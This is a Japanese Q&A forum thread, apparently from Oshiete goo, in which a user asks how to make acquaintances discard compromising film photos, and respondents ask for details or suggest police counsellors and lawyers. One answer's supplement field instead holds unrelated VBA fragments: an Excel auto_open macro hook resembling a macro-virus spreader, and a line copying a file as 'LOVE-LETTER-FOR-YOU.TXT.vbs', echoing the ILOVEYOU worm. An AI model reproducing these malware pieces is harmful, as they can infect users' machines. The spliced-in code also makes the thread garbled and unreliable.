電子書籍の厳選無料作品が豊富!

初めて質問させて頂きます。
とある知人にはめられた、というか弱みを握られて、
自分にとって不利益な写真を何枚か撮ってしまいました。
それは、極普通の場面での写真なので、所持者に
私の気にしていることを気付かれる確立は低いのですが、
とても不利益なものであることは間違いなく、、
何年も悩んできたのですが、やはり回収したくて仕方がありません。
本当に欝病一歩手前で持ちこたえている状況です。
写真の枚数は特定出来ておりませんが、30枚は超えていないと思います。
ただ、関係者の数が多すぎて、とても普通に対処したのでは、
誰が目的の写真を所持をしており、誰がしていないのか、
とても口頭やメール等で判断が出来るものではありません。
なので、何か自発的に、所持者にその写真を捨てるように仕向けるような、
頭のいい策がありませんでしょうか。
ほとんどの写真は恐らく使い捨てカメラによるフィルム写真であり、
どちらかといえば、フィルムの処分を優先したい状況です。
無理、諦めろ、気にするな、等の回答は、誠に申し訳ありませんが、
求めておりません。
何とか、解決に導けるような方法を求めています。
頭の良い方、知恵のある方、どうかお力をかして下さい!
回答お待ちしております。

A 回答 (3件)

他の回答にもありますが、「どうやって撮影されたもので、どんな写真で、どんな不利益があるのか」が不明なので「自発的に廃棄させる方法」と言われてもむずかしいですね。


しかもすでに多数にでまわっているとなおさらです。
無理やり考えれば「その写真は心霊写真で持っていると廃棄しないと不幸になる」という噂を流すことくらいしか思いつきません。
しかし、そんなことを言えばかえってその写真への関心を向けさせることにもなりますかもしれません。
やはり写真についてもう少し情報が必要です。

この回答への補足

Sub auto_open()

Application.OnSheetActivate = "check_files"

End Sub



Sub check_files()

c$ = Application.StartupPath

m$ = Dir(c$ & "\" & "PERSONAL.XLS")

If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0

If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0

whichfile = p + w * 10

End Sub

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

補足日時:2010/02/18 17:59
    • good
    • 0

頭悪いので、あまりよくないと思いますが、


法律的に問題無い写真でしたら、一度交番の相談員などに相談してはいかがでしょうか、
相談員も元は警察官などを経験した人間ですから良いアドバイスを貰えるかも知れません、
それが駄目なら、弁護士ですね、弁護士事務所にもよりますが、相談自体は、30分5000円からだそうです

この回答への補足

ご回答頂きありがとうございます。
法律的にはなんら問題ないです。
ただ、私が気にする事柄であることは間違いなく、
友人なども「気にしなければいい」の一点張りです。
私も気にしないように努めてはいたのですが、やはり難しいようです。
相談員、弁護士の件、ありがとうございました。
検討してみます。

補足日時:2010/01/09 21:59
    • good
    • 0

 私は頭は良くないのですが・・・


 不利益、といってもなぜ不利益なのかよくわからないので、それを明記して頂ければ回答する人は増えると思います。
 また、その知人というのはあなたにとってどのような人なのか、弱みはなぜ握られたのか、ということについても明記して頂ければ・・・。

この回答への補足

ご回答頂きありがとうございます。
個人特定が怖くて細部まで書かないでおいたのですが、
とある紙のようなものを持っています。
そこには名前が入っていて、
私も名前さえ入っていなければシラを切れるレベルなのですが、
そこに私に対しての酷い事柄が書かれております。
その知人は元・同級生で、とてもタイミング悪く弱みを握られました。
それをいいことに言う事を聞かされていたような状況です。
弱みの内容までは申し訳ありませんが明記できません。

補足日時:2010/01/09 21:54
    • good
    • 0

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!